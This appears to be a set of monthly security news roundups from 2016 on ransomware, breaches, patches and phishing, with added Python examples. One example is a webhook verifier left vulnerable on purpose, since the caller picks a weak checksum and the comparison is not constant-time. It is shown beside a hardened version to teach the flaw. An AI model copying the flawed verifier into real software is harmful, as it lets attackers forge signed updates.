  • Social engineering attacks leverage a user’s trust to get them to perform an action that negatively affects them. These attacks range from simple phishing campaigns looking for easy money or passwords to complex multi-stage operations that aim to compromise internal networks for theft of sensitive information or destruction. One recent example of a complex social engineering operation was identified in November, where actors possibly related to the Carbanak gang targeted a number of hospitality companies to compromise payment systems and steal credit card information. The attacks centred on customer service call centres, where attackers would claim to have issues accessing online services. The attacker would then email the customer service staff messages containing malicious attachments and persist until the employee opened the attachment and downloaded the malware. This attack is a reminder for businesses to understand which of their external-facing teams have unvetted contact with the public (service desks, HR, finance, legal, reception etc.) and could be vulnerable to this sort of attack.

Read More
http://www.computerworld.com/article/3141735/security/malware-attack-starts-with-a-fake-customer-service-call.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Carbanak-/-Anunak-Attack-Methodology/?page=1&year=0&month=0

 

Breaches

  • On Friday 25 November, the San Francisco Municipal Transportation Agency’s (SFMTA) Muni light rail system was infected with Mamba ransomware. “Computer screens at MUNI stations displayed a message: ‘You Hacked, ALL Data Encrypted. Contact For Key(cryptom27@yandex.com)ID:681 ,Enter.’ MUNI spokesman Paul Rose spoke to the Examiner and noted that his agency was ‘working to resolve the situation,’ but refused to provide additional details.”

Read More
http://www.theverge.com/2016/11/27/13758412/hackers-san-francisco-light-rail-system-ransomware-cybersecurity-muni
https://krebsonsecurity.com/2016/11/san-francisco-rail-system-hacker-hacked/

  • In the last week of November, a large number of Deutsche Telekom customers had their routers infected with a computer worm that takes full control of the router. Once the worm has control of the device, it joins the device to a network of other compromised routers and IoT (Internet of Things) devices to be used as a botnet. These botnets are mainly used for DDoS (Distributed Denial of Service) attacks against public-facing websites and other infrastructure. “More than 900,000 customers of German ISP Deutsche Telekom (DT) were knocked offline this week after their Internet routers got infected by a new variant of a computer worm known as Mirai.”

Read More
https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/

  • The Madison Square Garden Company has announced that hackers spent up to a year harvesting the credit card data of potentially millions of visitors after compromising a payment processing system. Although the exact number of affected cards is unknown, cards used to buy merchandise, food and drinks between November 9, 2015 and October 24, 2016 may have been affected. The incident was identified by banks noticing a pattern of fraudulent transactions on cards that had been used at MSG venues. Once MSG was informed, an investigation of the network revealed that unauthorised third parties had accessed the payment processing systems.

Read More
http://www.zdnet.com/article/madison-square-garden-admits-hackers-spent-a-year-harvesting-visitor-credit-card-data/
http://notice.themadisonsquaregardencompany.com/customerupdate/

  • UK network operator ‘Three’ suffered a suspected insider attack in which three people were arrested after accessing a database containing customers’ phone upgrade information, apparently in order to intercept the delivery of new handsets.

Read More
http://www.infosecurity-magazine.com/news/three-arrested-after-suspected/
http://www.infosecurity-magazine.com/news/three-breach-hit-133000-customers/

Patches and Updates

  • Mozilla has released Firefox 50.0.2 to patch CVE-2016-9079, a 0-day vulnerability that was being actively exploited in the wild; the same exploit was being used against Tor Browser users, and Tor Browser has been updated accordingly. Update immediately.

Read More
http://arstechnica.com/security/2016/11/tor-releases-urgent-update-for-firefox-0day-thats-under-active-attack/

  • Microsoft has published an overview of the ransomware-related detection and protection improvements implemented as part of the Windows 10 Anniversary Update.

Read More
http://wincom.blob.core.windows.net/documents/Ransomware_protection_in_Windows_10_Anniversary_Update.pdf

Other

  • Software made by Shanghai ADUPS Technology has been siphoning text messages and call records from cheap Android-based smartphones and secretly sending the data to servers in China. ADUPS software is typically bundled with smartphones made by dozens of global wireless firms, including ZTE, BLU and Huawei. Most of the affected devices are very cheap compared with leading handsets, partly because they carry on-screen advertisements.

Read More
https://krebsonsecurity.com/2016/11/chinese-iot-firm-siphoned-text-messages-call-records/

  • Big W has confirmed that a technical glitch in early November caused forms on its online store to be pre-populated with other customers’ information. After investigating, Big W announced that no passwords, bank or credit card details were compromised and that it was notifying the affected users.

Read More
http://www.zdnet.com/article/big-w-confirms-customer-data-exposure/

  • WordPress recently found and patched a serious vulnerability that, fortunately, was not being actively exploited: a remote code execution flaw in an open-source PHP webhook on the WordPress update server, api.wordpress.org. The problem with the webhook was that it let the calling party supply the hashing algorithm used to verify that code updates are legitimate. “Given a weak enough hashing algorithm, attackers could brute-force attack the webhook with a number of guesses that wouldn’t trigger WordPress’s security systems. WordFence managed to come up with an algorithm that reduced the amount of guesses from 400,000 to only 100,000 guesses, with randomly generated keys, at the hash value of the shared secret key. That guessing would only take a few hours. With the door successfully battered down, attackers could then send URLs to the WordPress update servers, which would then push them out to all WordPress sites.”

Read More
https://nakedsecurity.sophos.com/2016/11/25/the-wordpress-megahack-that-wasnt/
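The design flaw is worth seeing in code: a webhook that lets the request pick the hash algorithm will happily accept a 32-bit checksum such as adler32 in place of a 256-bit HMAC, shrinking the tag an attacker has to guess from 2^256 to at most 2^32 values (fewer in practice, since checksums are not uniformly distributed). The following is an added example written in Python as a stand-in for the PHP webhook the article describes; it is not WordPress or Wordfence code. The header names, the shared secret and the payload are assumptions, and the keyed checksum is a simplification of PHP’s hash_hmac() construction.

```python
"""Webhook signature verification: the flawed shape (caller chooses the algorithm, plain string
comparison) beside a hardened one. Added example; header names, secret and payload are assumed."""
import hashlib
import hmac
import zlib

SHARED_SECRET = b"constructed-demo-secret-replace-me"  # constructed; use a long random value in practice


def checksum_or_hmac(algo, key, body):
    """Mimic PHP hash_hmac(), whose algorithm list also includes non-cryptographic checksums.
    The checksum branches key by prefixing, a simplification of the real HMAC construction."""
    algo = algo.lower()
    if algo == "adler32":
        return "%08x" % zlib.adler32(key + body)
    if algo == "crc32":
        return "%08x" % zlib.crc32(key + body)
    return hmac.new(key, body, algo).hexdigest()  # ValueError for names hashlib does not know


def tag_space_bits(algo):
    """Upper bound on the bits an attacker must guess to hit a valid tag for this algorithm."""
    algo = algo.lower()
    if algo in ("adler32", "crc32"):
        return 32
    return hashlib.new(algo).digest_size * 8


def verify_vulnerable(headers, body, key=SHARED_SECRET):
    """Flawed: the request selects the algorithm, so an attacker downgrades to a 32-bit checksum
    and guesses the tag online; the '==' comparison additionally leaks timing."""
    algo = headers.get("X-Hash-Algo", "sha256")
    try:
        expected = checksum_or_hmac(algo, key, body)
    except (ValueError, TypeError):
        return False
    return expected == headers.get("X-Signature", "")


PINNED_ALGO = "sha256"


def verify_hardened(headers, body, key=SHARED_SECRET):
    """Server pins the algorithm, refuses any attempt to negotiate it, and compares in constant time."""
    if headers.get("X-Hash-Algo", PINNED_ALGO).lower() != PINNED_ALGO:
        return False
    expected = hmac.new(key, body, PINNED_ALGO).hexdigest()
    supplied = headers.get("X-Signature", "")
    return hmac.compare_digest(expected.encode(), supplied.encode())


if __name__ == "__main__":
    body = b'{"url":"https://updates.example/pkg.zip"}'  # constructed payload
    downgraded = {"X-Hash-Algo": "adler32",
                  "X-Signature": checksum_or_hmac("adler32", SHARED_SECRET, body)}
    print("vulnerable accepts adler32 tag:", verify_vulnerable(downgraded, body))
    print("hardened accepts adler32 tag:  ", verify_hardened(downgraded, body))
    print("guess space bits: adler32 =", tag_space_bits("adler32"), "sha256 =", tag_space_bits("sha256"))
```

The hardened verifier still needs rate limiting on failed signatures and a secret of at least 32 random bytes, but the essential fix is that the algorithm is a server-side constant, never a request parameter.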

  • Deliveroo in the UK had a number of customer accounts hijacked and fraudulent orders placed on them. Deliveroo states that its own application was not to blame for the hijacking; it attributes the fraudulent transactions to customers reusing the same username and password across multiple services, with the credentials having been obtained from a breach at another company.

Read More
https://nakedsecurity.sophos.com/2016/11/25/fraudsters-eat-for-free-as-deliveroo-accounts-hit-by-mystery-breach/

October 2016 Internet Security Report


Joomla takes the cake for the most serious exploits doing the rounds this month, with a combination of account-creation and privilege-escalation vulnerabilities proving an easy way to take complete control of various Joomla versions. The diagnosis is grim for anyone who did not patch within 24 hours: mass exploitation of these vulnerabilities has been reported, so if you have not patched you should assume your Joomla site is already compromised.

Threats

  • Joomla 3.6.4 was released to address account creation, privilege elevation and account modification vulnerabilities that were being actively exploited en masse across the web within days of disclosure. Anyone who has not already updated should consider their site compromised.
    https://www.joomla.org/announcements/release-news/5678-joomla-3-6-4-released.html
  • Microsoft patched 45 security flaws in its October 2016 updates, one of which is being actively exploited as part of a malvertising campaign. This was also Microsoft’s first month with its new cumulative patching approach, which removes the ability to pick and choose which patches to apply. The new model puts much more pressure on software maintainers to release fixes promptly for applications that break after patching, as organisations would otherwise have to choose between being vulnerable to exploits and having a functional application.
    https://technet.microsoft.com/en-us/library/security/ms16-oct.aspx
  • Google has disclosed an unpatched 0-day vulnerability in Windows after its disclosure deadline for actively exploited vulnerabilities expired. No patch is yet available for the flaw, which Google describes as a “local privilege escalation in the Windows kernel that can be used as a security sandbox escape”. The Windows 10 Anniversary Update is not vulnerable, and Microsoft says patches for older versions of Windows will be released on Tuesday, November 8.
    https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
    https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/
  • The Linux kernel local privilege escalation vulnerability known as Dirty COW (CVE-2016-5195) has been patched roughly nine years after the bug was introduced. Because it has existed for so long, it affects practically every Linux-powered device, from cars to Android phones and routers. Cleaning up this Dirty COW will not be easy: many devices are simply no longer supported, and for others patches take months to be released.
    http://dirtycow.ninja/
  • DNS hosting provider Dyn was hit by a huge DDoS attack that knocked much of its service offline. Because Dyn is an authoritative DNS provider, the effects reached far beyond Dyn itself: many major websites became unreachable because users could not resolve the names of sites hosted on Dyn’s DNS.
    Read more on Krebs on Security website
  • Spam has been observed being delivered as a calendar invite file (.ics) containing a meeting cancellation addressed to a long list of recipients. Depending on how the recipient’s calendar client handles the invite, it may forward the spam to all of those recipients from your own email address.
    https://isc.sans.edu/forums/diary/Spam+Delivered+via+ICS+Files/21611/
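A mail gateway can pick out this trick before the calendar client ever sees the file. The following is an added example, not code from the ISC diary: a small parser for the .ics attachment that unfolds RFC 5545 line continuations, then flags a CANCEL or REQUEST addressed to an unusually long attendee list, attendees spread across many unrelated domains, or an organizer whose domain does not match the sending mail domain. The thresholds, addresses and domains are constructed for the example.

```python
"""Flag .ics attachments shaped like the cancellation-spam trick. Added example, not from the
ISC diary; thresholds are assumptions and every address and domain below is constructed."""
import re

ATTENDEE_THRESHOLD = 20   # assumption: genuine invites rarely carry this many attendees
DOMAIN_THRESHOLD = 10     # assumption: many distinct attendee domains looks like a bought list


def unfold(text):
    """Undo RFC 5545 line folding: a line beginning with a space or tab continues the previous one."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_properties(text):
    """Return (NAME, value) pairs; parameters such as ';CN=...' are stripped from the name."""
    props = []
    for line in unfold(text):
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        props.append((head.split(";", 1)[0].strip().upper(), value.strip()))
    return props


def mail_domain(value):
    """'mailto:User@Example.org' -> 'example.org'; empty string if the value is not a mailto URI."""
    m = re.search(r"mailto:[^@\s]+@([^\s>;]+)", value, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def assess(ics_text, sender_domain):
    """Return a list of reasons the invite looks like spam (empty list means nothing suspicious)."""
    props = parse_properties(ics_text)
    method = next((v.upper() for n, v in props if n == "METHOD"), "")
    attendees = [v for n, v in props if n == "ATTENDEE"]
    organizer = next((v for n, v in props if n == "ORGANIZER"), "")
    reasons = []
    if method in ("CANCEL", "REQUEST") and len(attendees) >= ATTENDEE_THRESHOLD:
        reasons.append(f"{method} addressed to {len(attendees)} attendees")
    domains = {mail_domain(a) for a in attendees} - {""}
    if len(domains) >= DOMAIN_THRESHOLD:
        reasons.append(f"attendees span {len(domains)} distinct domains")
    org_domain = mail_domain(organizer)
    if org_domain and org_domain != sender_domain.lower():
        reasons.append(f"organizer domain {org_domain} differs from sender domain {sender_domain.lower()}")
    return reasons


def _attendee_lines(n):
    return "\n".join(f"ATTENDEE;CN=Contact {i};RSVP=TRUE:mailto:user{i}@domain{i}.example" for i in range(n))


# Constructed samples: a spam cancellation (note the folded SUMMARY line) and a normal team invite.
SPAM_CANCEL = f"""BEGIN:VCALENDAR
METHOD:CANCEL
BEGIN:VEVENT
UID:constructed-1
SUMMARY:Your order has been cancelled - see
  attached offer
ORGANIZER;CN=Promotions:mailto:promo@offers-example.net
{_attendee_lines(25)}
END:VEVENT
END:VCALENDAR"""

BENIGN_REQUEST = f"""BEGIN:VCALENDAR
METHOD:REQUEST
BEGIN:VEVENT
UID:constructed-2
SUMMARY:Weekly sync
ORGANIZER;CN=Alice:mailto:alice@corp.example
ATTENDEE:mailto:bob@corp.example
ATTENDEE:mailto:carol@corp.example
END:VEVENT
END:VCALENDAR"""

if __name__ == "__main__":
    print(assess(SPAM_CANCEL, "freemail-example.org"))
    print(assess(BENIGN_REQUEST, "corp.example"))
```

The sender domain would normally come from the authenticated envelope or From: header of the carrying message; the point of the organizer check is that a cancellation whose organizer is not the party sending it should never be auto-processed.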

Breaches

Other

  • The Privacy Amendment (Notifiable Data Breaches) Bill 2016 has passed its second reading in the Australian House of Representatives. If passed, the bill will require entities subject to the Privacy Act 1988 to issue a notification when personal information is lost or exposed in circumstances likely to result in serious harm.
  • The Register has published an interesting post on the potential liabilities of being hacked.
    http://www.theregister.co.uk/2016/10/14/been_hacked_what_are_you_liable_for/

September 2016 Internet Security Report


September 2016 delivered an eventful month for cyber security, with a handful of threats, breaches and interesting developments in the security of Internet of Things devices. A Denial of Service attack on the website of investigative journalist Brian Krebs was found to be largely sourced from compromised Internet of Things devices. Ransomware continued to cause trouble for computer users at all levels, with a number of new variants and delivery methods entering the threat landscape.

 

Threats

  • Ransomware continues to be a major threat to organisations worldwide, with cybercriminals finding new ways to infect users. This month a new variant called Mamba was identified which encrypts the whole disk instead of individual files. It does this by bundling a copy of the open-source disk encryption tool DiskCryptor and using it to encrypt the victim’s hard drive(s). Like most other ransomware variants, Mamba uses malicious attachments to deliver its payload and compromise the user’s system. Please ensure that you have adequate backup and restore policies in place and routinely test them to reduce the threat posed by ransomware.

https://threatpost.com/mamba-ransomware-encrypts-hard-drives-rather-than-files/120730/
https://nakedsecurity.sophos.com/2016/09/27/mamba-ransomware-strikes-at-your-whole-disk-not-just-your-files/

  • A new ransomware campaign appears to be targeting educational institutions and government agencies. The ransomware, called MarsJoke, is distributed via emails containing a link that downloads a file called ‘file_6.exe’. The emails bear the branding of popular shipping and postal companies.

https://threatpost.com/marsjoke-ransomware-targets-edu-gov-agencies/120856/

  • Victoria Police have released an advisory that unmarked USB drives have been placed in the letterboxes of Melbourne residents. The drives contain malicious software which appears to render victims’ computers unusable. If you receive an unexpected USB drive in the mail, do not plug it into your computer or any other device. Beyond the malware stored on them, such devices can contain hardware that emulates your computer’s keyboard and mouse to deliver malware, or, in the case of the “USB Killer”, permanently disable your USB port or even the computer itself.

http://www.businessinsider.com.au/melbourne-residents-are-receiving-harmful-usb-drives-in-their-letterboxes-2016-9
https://www.usbkill.com/usb-killer/8-usb-killer.html

  • The APT group known variously as APT28, Fancy Bear, Sednit, Sofacy and Pawn Storm is running a phishing campaign targeting Mac OS X users. The campaign uses emails with attachments designed to look like PDF documents; the attachment is not a PDF but an executable that opens a PDF after it runs so as not to arouse suspicion. User interaction is still required to install the malware, but Mac users may be less cautious because of the common fallacy that Mac OS X does not get viruses.

https://threatpost.com/sofacy-apt-targeting-os-x-machines-with-komplex-trojan/120882/
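A “PDF” that is really an executable is caught by looking at the bytes rather than the name. The following is an added example (not code from the Threatpost article or the Komplex analysis) that identifies an attachment by its leading magic bytes, flags a document-looking name sitting on executable content or a doubled extension, and searches an executable for an embedded “%PDF” decoy of the kind a dropper opens to look legitimate. All sample bytes are constructed.

```python
"""Detect attachments that claim to be documents but are executables, and executables carrying
an embedded PDF decoy. Added example; sample bytes and file names are constructed."""

# Leading bytes of executable containers. CAFEBABE is shared by Mach-O fat binaries and Java
# class files; both are executable content, so the ambiguity does not matter here.
EXECUTABLE_MAGIC = {
    b"\xfe\xed\xfa\xce": "mach-o-32",
    b"\xfe\xed\xfa\xcf": "mach-o-64",
    b"\xce\xfa\xed\xfe": "mach-o-32",   # little-endian on-disk form
    b"\xcf\xfa\xed\xfe": "mach-o-64",   # little-endian on-disk form (x86_64 Macs)
    b"\xca\xfe\xba\xbe": "mach-o-fat-or-java-class",
    b"MZ": "pe",
    b"\x7fELF": "elf",
}
DOCUMENT_MAGIC = {
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0": "ole2-office",
    b"PK\x03\x04": "zip-container",   # docx/xlsx, but also jar files and zipped .app bundles
}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".rtf", ".txt"}
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".app", ".jar", ".js", ".vbs"}


def identify(data):
    """Content type from the first bytes, or 'unknown'."""
    for magic, kind in EXECUTABLE_MAGIC.items():
        if data.startswith(magic):
            return kind
    for magic, kind in DOCUMENT_MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def is_executable(data):
    return identify(data) in set(EXECUTABLE_MAGIC.values())


def name_verdict(filename):
    """'document' if the name claims a document, 'double-extension' for invoice.pdf.exe, else 'other'."""
    parts = filename.lower().strip().split(".")
    if len(parts) < 2:
        return "other"
    last = "." + parts[-1]
    inner = {"." + p for p in parts[1:-1]}
    if last in EXEC_EXTENSIONS and inner & DOCUMENT_EXTENSIONS:
        return "double-extension"
    if last in DOCUMENT_EXTENSIONS:
        return "document"
    return "other"


def disguised(filename, data):
    """A reason string when the attachment misrepresents itself, otherwise None."""
    kind = identify(data)
    verdict = name_verdict(filename)
    if verdict == "double-extension":
        return f"double extension hides executable ({kind})"
    if verdict == "document" and is_executable(data):
        return f"named as a document but content is {kind}"
    return None


def embedded_pdf_offset(data, start=4):
    """Offset of a '%PDF' header inside (not at the start of) the data, or -1. A hit inside an
    executable is the decoy document a dropper displays after it runs."""
    return data.find(b"%PDF", start)


def scan_file(path):
    """Apply the checks to a file on disk; returns (content_type, disguise_reason, decoy_offset)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return identify(data), disguised(path.rsplit("/", 1)[-1], data), embedded_pdf_offset(data)


# Constructed samples: a minimal PDF, and a fake 64-bit Mach-O header followed by that PDF as decoy.
REAL_PDF = b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n%%EOF\n"
MACHO_DROPPER = b"\xcf\xfa\xed\xfe" + b"\x07\x00\x00\x01" + b"\x00" * 56 + REAL_PDF

if __name__ == "__main__":
    print(disguised("roomrates.pdf", MACHO_DROPPER), embedded_pdf_offset(MACHO_DROPPER))
    print(disguised("roomrates.pdf", REAL_PDF), embedded_pdf_offset(REAL_PDF))
```

Magic-byte checks are cheap enough to run on every attachment at the gateway; on a workstation, `file <attachment>` gives the same first answer, and Finder’s “Get Info” kind field should read PDF document, not Application.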

  • Malvertising is the use of an online ad or pop-up to compromise an end user through malicious scripting. These ads are encountered during ordinary browsing and can often compromise a user silently, without any visual prompt. Although not a new technique, it has recently seen a resurgence as a way to spread ransomware. One recent example was the popular website answers.com, which was observed distributing malware through embedded advertising: visitors were exposed to the RIG exploit kit serving ransomware, potentially without answers.com even realising it was happening. Keeping your operating system and applications adequately patched remains the most effective way to mitigate this sort of drive-by download attack.

https://blog.malwarebytes.com/cybercrime/exploits/2016/09/rig-exploit-kit-takes-on-large-malvertising-campaign/
http://www.infosecurity-magazine.com/news/malvertising-attack-threatens-2/

 

Breaches

  • Point-of-sale vendor H&L Australia has reportedly been breached by an unknown threat actor. The threat actor allegedly sold access to a database server, and it is believed that at the very least a 14.1 GB database dump has been stolen. Customers of H&L Australia include the Australian Leisure and Hospitality Group, which operates around 330 pubs and clubs in Australia.

http://www.theregister.co.uk/2016/09/20/exclusive_hackers_claim_pos_tech_firm_breach/

  • UK-based smartphone news and reviews forum MoDaCo has confirmed a breach of 880,000 members’ usernames, passwords, email addresses and IP addresses. The breach is believed to have occurred in January 2016 through a compromised administrator account. Although a lot of information was leaked, MoDaCo says passwords were stored using the Blowfish cipher. “Security researcher Troy Hunt, who runs ‘Have I Been Pwned?’, says that 70 percent of the email addresses exposed in this breach were already contained in data batches from previous breaches of other online services.” – (Zeljka Zorz – helpnetsecurity.com, 2016)

Read more on Help Net Security website

 

Other

  • Investigative journalist Brian Krebs has been the target of one of the largest Distributed Denial of Service (DDoS) attacks ever recorded, peaking at around 620 Gbps. Krebs’s website, krebsonsecurity.com, had DDoS protection provided by Akamai, which absorbed the attack but has since dropped Krebs as a client. The website is now protected by Google’s Project Shield, a free service offered to selected journalists and news sites to protect them from censorship by DDoS.

Read more on Krebs on Security website

  • The threat actor calling itself ‘The Shadow Brokers’ has acquired stolen NSA hacking tools and is attempting to sell them on the black market. The tools have been confirmed as NSA tools by an unnamed source within the FBI group investigating the incident. It is believed they were stolen when they were left on a remote staging server three years ago and that server was subsequently compromised. So far there has reportedly been little interest in buying the tools, probably because the NSA is actively looking for evidence of their use, and any buyer risks attracting the NSA’s attention by using them.

Read more on Naked Security website

  • Sandbox-aware malware continues to develop. In recently observed cases, a document macro searched the system for Word documents in order to decide whether it was running in an analysis sandbox or on a real user’s machine: if it found two or fewer Word documents the macro terminated, and only when it found more than two did it call out to download its payload for execution. These advances show a growing need to make sandbox environments a more realistic snapshot of the kinds of machines the malware targets.

https://it.slashdot.org/story/16/09/24/1834249/malware-evades-detection-by-counting-word-documents
https://threatpost.com/malware-evades-detection-with-novel-technique/120787/

August 2016 Internet Security Report


August 2016 was an overall interesting month for cyber security with the annual conferences taking place in America, the Census providing some interesting lessons learnt and discussion; and the Olympics creating an interesting platform for malicious actors. In addition to this, the industry as a whole experienced a diverse range of new threats, breaches and success stories.

Threats

  • Sophos has identified a trend of shortcut files (.LNK) being used to hide ransomware downloaders. A shortcut lets malicious actors disguise the downloader by making the link appear benign. Users are reminded to be wary of any links or attachments they receive in emails and, when in doubt, to report them or get a second opinion.

https://nakedsecurity.sophos.com/2016/08/03/beware-of-ransomware-hiding-in-shortcuts/

  • US-based researcher Elie Bursztein presented the findings of a social experiment conducted at a US university in which a number of USB drives with ‘phone home’ capability were dropped around campus. Surprisingly, 48% of the 297 drives dropped were plugged into a computer and the phone-home code was activated. When surveyed, most of the people who opened the drives said they had been trying to return the drive to its rightful owner. The study highlights the level of trust people place in USB devices; although the drives used in the study were not actually malicious, it is important to always be wary of the origin of a USB device, especially one that has been found or given away for free.

https://threatpost.com/never-trust-a-found-usb-drive-black-hat-demo-shows-why/119653/

  • The increased attention generated by the Olympics is believed to have driven a rise in banking malware in Brazil. This is a good reminder of how current events, both global and domestic, are used by malicious actors to increase the chances of a successful social engineering attack.

http://www.infosecurity-magazine.com/news/olympics-panda-zeus-chomps-into/
http://www.infosecurity-magazine.com/news/brazil-hit-with-a-second-banking/

  • A new banking Trojan kit called Scylex has been discovered being sold as a service. It is likely to fill the malware-as-a-service void created by the downfall of previously dominant Trojans such as Zeus/SpyEye, Citadel and ZeroAccess. It is still unclear how operational or effective the new service is; however, if it delivers on its promises it has the potential to wreak havoc on financial institutions.

http://www.securitynewspaper.com/2016/08/13/new-scylex-banking-trojan-kit-surfaces-dark-web/
http://www.infosecurity-magazine.com/news/meet-scylex-the-new-financial/

Breaches

  • Accountancy software provider The Sage Group experienced an incident in which a user used valid internal credentials to access a number of sensitive customer files. As the investigation is still ongoing, the scale of the breach is uncertain; however, an arrest has been reported in connection with the breach, resulting in fraud charges. The incident highlights the real risk that insider threats pose to an organisation.

http://www.theregister.co.uk/2016/08/15/sage_breached_in_apparent_insider_attack/
http://www.welivesecurity.com/2016/08/15/high-profile-data-breach-sage-draws-attention-internal-threats/
http://www.infosecurity-magazine.com/news/sage-employee-arrested-data-breach/

  • This month 20 US hotels were identified as infected with point-of-sale malware designed to harvest credit card information. These attacks continue to highlight how every device on a network needs to be considered and assessed from a security standpoint. With malicious actors becoming more creative and more aware of the weakest points of an organisation’s information systems, it is important to know every host on the network and its importance to the business, and to ensure that appropriate security and risk management controls are in place and adhered to.

http://www.zdnet.com/article/20-top-us-hotels-hit-by-fresh-malware-attacks/
http://www.theregister.co.uk/2016/08/15/pos_malware_stings_20_us_hotels/

Patches and Updates

  • Microsoft Office patch MS16-099 resolved several vulnerabilities that allowed remote code execution if a user opened a specially crafted document. These continue to be a problem, with common phishing emails claiming to carry an invoice or a resume likely to make use of such exploits. Ensure these patches are deployed as soon as possible.

https://technet.microsoft.com/en-us/library/security/MS16-099

  • In one of the most interesting security news events in recent history, tools from the notorious ‘Equation Group’, which has previously been attributed to an NSA-backed threat actor, were put up for auction on an underground forum by an actor known as ‘The Shadow Brokers’. The Shadow Brokers initially floated a price of 1 million bitcoin (roughly 580 million USD), which naturally drew a lot of suspicion and scepticism about the legitimacy of the claim. As time went on and samples of the tools up for auction were released as proof, the reality of the situation began to set in, with a number of large vendors validating the legitimacy of the tools and exploits and subsequently releasing urgent patches. Vendors who have released updates and comments include:

– Cisco – https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
– Fortinet – http://fortiguard.com/advisory/FG-IR-16-023
– Juniper – https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10605&actp=search

Other

  • Project Sauron, also known as Strider, is a sophisticated modular cyber-espionage platform believed to be part of an Advanced Persistent Threat (APT) campaign, documented in some detail at the link below. The platform has been found attacking high-profile targets in government, finance, military, telecommunications and scientific research.

https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/

  • Brisbane City Council has lost just over $450,000 AUD in a sophisticated spear-phishing scam in which scammers posing as a legitimate professional services provider used a series of fake invoices to extract nine payments between 13 July and 16 August. Unfortunately the likelihood of recovering the funds is low; law enforcement is pursuing the matter and Deloitte has been engaged to investigate the incident. Sadly this type of fraud is a constant threat, and it is most effective where financial payment controls and processes are lax or where staff bypass the existing processes. Requiring that outgoing payments, and any change to a supplier’s bank details, be peer-reviewed and enforcing a structural separation of duties substantially reduces the risk of these scams succeeding.

http://www.theregister.co.uk/2016/08/16/brisbane_councillors_lose_500k_to_scammers/
http://www.abc.net.au/news/2016-08-16/brisbane-city-council-loses-450k-to-scammers/7746812